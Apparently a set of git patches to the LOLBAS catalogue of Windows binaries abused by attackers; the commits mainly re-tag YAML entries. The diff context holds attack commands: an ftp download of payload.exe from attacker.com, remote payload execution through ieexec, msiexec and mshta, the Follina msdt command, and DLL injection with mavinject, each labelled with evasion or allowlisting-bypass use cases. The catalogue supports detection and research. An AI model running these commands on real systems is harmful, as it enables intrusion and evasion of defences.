Format Full_Path: - Path: C:\Windows\System32\control.exe - Path: C:\Windows\SysWOW64\control.exe diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index 3f9d3527..129672d6 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: WSH - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\cscript.exe - Path: C:\Windows\SysWOW64\cscript.exe diff --git a/yml/OSBinaries/CustomShellHost.yml b/yml/OSBinaries/CustomShellHost.yml index 16dd0b06..7390b356 100644 --- a/yml/OSBinaries/CustomShellHost.yml +++ b/yml/OSBinaries/CustomShellHost.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Fixed Format Full_Path: - Path: C:\Windows\System32\CustomShellHost.exe Detection: diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index c52a3a6f..ab8ca266 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: ClickOnce - Execute: Remote - - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index a3ddba27..c54501fa 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows server Tags: - Execute: CMD - - Input: Custom Format - Command: diskshadow> exec calc.exe Description: Execute commands using diskshadow.exe to spawn child process Usecase: Use diskshadow to bypass defensive counter measures @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows server Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\SysWOW64\diskshadow.exe diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index f4db3af5..613ce761 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index e3328c1f..378d7c28 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml @@ -46,7 +46,6 @@ Commands: Privileges: Admin MitreID: T1003.003 OperatingSystem: Windows 10, Windows 11, Windows 2016 Server, Windows 2019 Server - Full_Path: - Path: C:\Windows\System32\esentutl.exe - Path: C:\Windows\SysWOW64\esentutl.exe diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index f4885348..1c0e2ff3 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format - Command: explorer.exe C:\Windows\System32\notepad.exe Description: Execute notepad.exe with the parent process spawning from a new instance of explorer.exe Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: C:\Windows\explorer.exe - Path: C:\Windows\SysWOW64\explorer.exe diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index 076343aa..c75e30a1 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format Full_Path: - Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index 8b771963..a2368721 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe diff --git a/yml/OSBinaries/Fsutil.yml b/yml/OSBinaries/Fsutil.yml index 5714d372..e4b38ed1 100644 --- a/yml/OSBinaries/Fsutil.yml +++ b/yml/OSBinaries/Fsutil.yml @@ -27,7 +27,6 @@ Commands: OperatingSystem: Windows 11 Tags: - Execute: EXE - - Input: Fixed Format Full_Path: - Path: C:\Windows\System32\fsutil.exe - Path: C:\Windows\SysWOW64\fsutil.exe diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index 21ea0a6f..6b4828bf 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Custom Format - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" Description: Download Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary. diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index 0a5b355c..3ac6adcb 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Fixed Format - Command: Gpscript /startup Description: Executes startup scripts configured in Group Policy Usecase: Add local group policy logon script to execute file and hide from defensive counter measures @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Fixed Format Full_Path: - Path: C:\Windows\System32\gpscript.exe - Path: C:\Windows\SysWOW64\gpscript.exe diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index bc55c986..e861cd2b 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -20,7 +20,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Input: Custom Format - Command: HH.exe http://some.url/payload.chm Description: Executes a remote payload.chm file which can contain commands. Usecase: Execute commands with HH.exe @@ -32,7 +31,6 @@ Commands: - Execute: CMD - Execute: CHM - Execute: Remote - - Input: Custom Format Full_Path: - Path: C:\Windows\hh.exe - Path: C:\Windows\SysWOW64\hh.exe diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index ae5dd4a9..80c6cc52 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: INF - - Input: Fixed Format Full_Path: - Path: c:\windows\system32\ie4uinit.exe - Path: c:\windows\sysWOW64\ie4uinit.exe diff --git a/yml/OSBinaries/Iediagcmd.yml b/yml/OSBinaries/Iediagcmd.yml index 9d5ddcc6..056e30ee 100644 --- a/yml/OSBinaries/Iediagcmd.yml +++ b/yml/OSBinaries/Iediagcmd.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11 Tags: - Execute: EXE - - Input: Fixed Format Full_Path: - Path: C:\Program Files\Internet Explorer\iediagcmd.exe Detection: diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index 43ba954d..3b659dd0 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: Remote - Execute: .NetEXE - - Input: Custom Format - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe Description: Downloads and executes bypass.exe from the remote server. Usecase: Download and run attacker code from remote location @@ -25,7 +24,6 @@ Commands: Tags: - Execute: Remote - Execute: .NetEXE - - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index 9d8c607c..d0f129a8 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: INF - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index a5868cab..8a070107 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: .NetDLL - Execute: .NetEXE - - Input: Custom Format - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting @@ -25,7 +24,6 @@ Commands: Tags: - Execute: .NetDLL - Execute: .NetEXE - - Input: Custom Format - Command: InstallUtil.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index f89afc01..33e2aa7c 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 Usecase: Inject dll file into running process @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\mavinject.exe - Path: C:\Windows\SysWOW64\mavinject.exe diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index a711f8e6..5d76acaf 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: VB.Net - Execute: Csharp - - Input: Custom Format - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -25,7 +24,6 @@ Commands: Tags: - Execute: VB.Net - Execute: Csharp - - Input: Custom Format - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -36,7 +34,6 @@ Commands: Tags: - Execute: VB.Net - Execute: Csharp - - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe Code_Sample: diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index 0eb4ee99..7cbe41ac 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 Tags: - Execute: DLL - - Input: Custom Format - Command: mmc.exe gpedit.msc Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC. Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL. diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index 80a2fa57..da29e92c 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: Csharp - - Input: Custom Format - Command: msbuild.exe project.csproj Description: Build and execute a C# project stored in the target csproj file. Usecase: Compile and run code @@ -23,7 +22,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: Csharp - - Input: Custom Format - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo Description: Executes generated Logger DLL file with TargetLogger export Usecase: Execute DLL @@ -33,7 +31,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Input: Custom Format - Command: msbuild.exe project.proj Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. Usecase: Execute project file that contains XslTransformation tag parameters @@ -43,7 +40,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: WSH - - Input: Custom Format - Command: msbuild.exe @sample.rsp Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Usecase: Bypass command-line based detections @@ -53,7 +49,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe diff --git a/yml/OSBinaries/Msconfig.yml b/yml/OSBinaries/Msconfig.yml index 54ba0b5e..f8c829ef 100644 --- a/yml/OSBinaries/Msconfig.yml +++ b/yml/OSBinaries/Msconfig.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\msconfig.exe Code_Sample: diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index 1b9649eb..e6811049 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -14,7 +14,6 @@ Commands: Tags: - Application: GUI - Execute: MSI - - Input: Custom Format - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Usecase: Execute code bypass Application whitelisting @@ -25,7 +24,6 @@ Commands: Tags: - Application: GUI - Execute: MSI - - Input: Custom Format - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe" Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. Usecase: Execute code bypass Application allowlisting @@ -36,7 +34,6 @@ Commands: Tags: - Application: GUI - Execute: CMD - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Msdt.exe - Path: C:\Windows\SysWOW64\Msdt.exe diff --git a/yml/OSBinaries/Msedge.yml b/yml/OSBinaries/Msedge.yml index 96d6f820..d0cc16d4 100644 --- a/yml/OSBinaries/Msedge.yml +++ b/yml/OSBinaries/Msedge.yml @@ -27,7 +27,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - - Input: Custom Format Full_Path: - Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe - Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index a3d4fdea..355b5470 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -14,7 +14,6 @@ Commands: Tags: - Execute: WSH - Execute: Remote - - Input: Custom Format - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index f58f0277..92390c16 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -13,7 +13,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: MSI - - Input: Custom Format - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png Description: Installs the target remote & renamed .MSI file silently. Usecase: Execute custom made msi file with attack code from remote server @@ -24,7 +23,6 @@ Commands: Tags: - Execute: MSI - Execute: Remote - - Input: Custom Format - Command: msiexec /y "C:\folder\evil.dll" Description: Calls DllRegisterServer to register the target DLL. Usecase: Execute dll files @@ -35,7 +33,6 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Input: Custom Format - Command: msiexec /z "C:\folder\evil.dll" Description: Calls DllUnregisterServer to un-register the target DLL. Usecase: Execute dll files @@ -46,7 +43,6 @@ Commands: Tags: - Execute: DLL - Execute: Remote - - Input: Custom Format - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input. Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server @@ -56,7 +52,6 @@ Commands: OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: Remote - - Input: Custom Format Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe From c34810b29b1e9f787bcf0baf84da51c0d2e8aa22 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:08:27 +0200 Subject: [PATCH 077/148] Update Mshta.yml Tags Changed Execute: WSH to HTA --- yml/OSBinaries/Mshta.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 355b5470..eb8167d4 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: HTA - Execute: Remote - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) Description: Executes VBScript supplied as a command line argument. @@ -40,7 +40,7 @@ Commands: MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) Tags: - - Execute: WSH + - Execute: HTA - Command: mshta.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server From e25d9fa435a6341c6b27b451ed49c677f4089175 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:10:51 +0200 Subject: [PATCH 078/148] Update Advpack.yml Tags Added Tags: Execute: INF Execute: EXE Execute: CMD --- yml/OSLibraries/Advpack.yml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index b09f76a0..f445a41a 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: INF - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. @@ -19,7 +21,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF - Command: rundll32.exe advpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. @@ -36,6 +38,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. @@ -43,6 +47,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\advpack.dll - Path: c:\windows\syswow64\advpack.dll From 87241b3051445298fb770639bca5d5624d6cc79d Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:13:30 +0200 Subject: [PATCH 079/148] Update Desk.yml Tags Added Tags: Execute: EXE Execute: Remote --- yml/OSLibraries/Desk.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/yml/OSLibraries/Desk.yml b/yml/OSLibraries/Desk.yml index 163badf0..935a6f56 100644 --- a/yml/OSLibraries/Desk.yml +++ b/yml/OSLibraries/Desk.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function. Usecase: Launch any executable payload, as long as it uses the .scr extension. @@ -18,6 +20,9 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE + - Execute: Remote Full_Path: - Path: C:\Windows\System32\desk.cpl - Path: C:\Windows\SysWOW64\desk.cpl From f08605710402a2684e398080aa7da120584ab2c7 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:14:56 +0200 Subject: [PATCH 080/148] Update Dfshim.yml Tags Added Tags: - Execute: ClickOnce - Execute: Remote --- yml/OSLibraries/Dfshim.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml index 36fd9d9a..6f76b896 100644 --- a/yml/OSLibraries/Dfshim.yml +++ b/yml/OSLibraries/Dfshim.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: ClickOne + - Execute: Remote Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe From f09cfa5b8cbeb7e77e35fcdfe0357ce506f3fe53 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:16:43 +0200 Subject: [PATCH 081/148] Update Ieadvpack.yml Tags Added Tags: - Execute INF - Execute EXE - Execute CMD --- yml/OSLibraries/Ieadvpack.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 5b745646..bda0f4cb 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: INF - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1, Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied). Usecase: Run local or remote script(let) code through INF file specification. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: INF - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. @@ -34,6 +38,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. @@ -41,6 +47,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\ieadvpack.dll - Path: c:\windows\syswow64\ieadvpack.dll From 0672acf1da201b6dcbd5d65f7266e5433741bd47 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:19:05 +0200 Subject: [PATCH 082/148] Update Ieframe.yml Tags Added Tags: Execute: EXE --- yml/OSLibraries/Ieframe.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 5bcb8b4c..6ee5a3f3 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\ieframe.dll - Path: c:\windows\syswow64\ieframe.dll From 98dde3b672cb56f433679ae1e789344014ddd9f8 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:20:21 +0200 Subject: [PATCH 083/148] Update Mshtml.yml Tags Added Tags: Executable HTA --- yml/OSLibraries/Mshtml.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 576dd097..a7701fe9 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: HTA Full_Path: - Path: c:\windows\system32\mshtml.dll - Path: c:\windows\syswow64\mshtml.dll From 25047c34d9b694610af362b319147df17b9f1893 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:21:47 +0200 Subject: [PATCH 084/148] Update Pcwutl.yml Tags Added Tags: Execute EXE --- yml/OSLibraries/Pcwutl.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 61fd9196..407d41c5 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\pcwutl.dll - Path: c:\windows\syswow64\pcwutl.dll From b1d0a85d2ee8fab0354d130e46c9694d8ed84fa5 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 18:25:38 +0200 Subject: [PATCH 085/148] Update Setupapi.yml Tags Changed Input: INF to Execute:INF for consistency --- yml/OSLibraries/Setupapi.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index e5b6ccc2..b6836b62 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. Usecase: Load an executable payload. 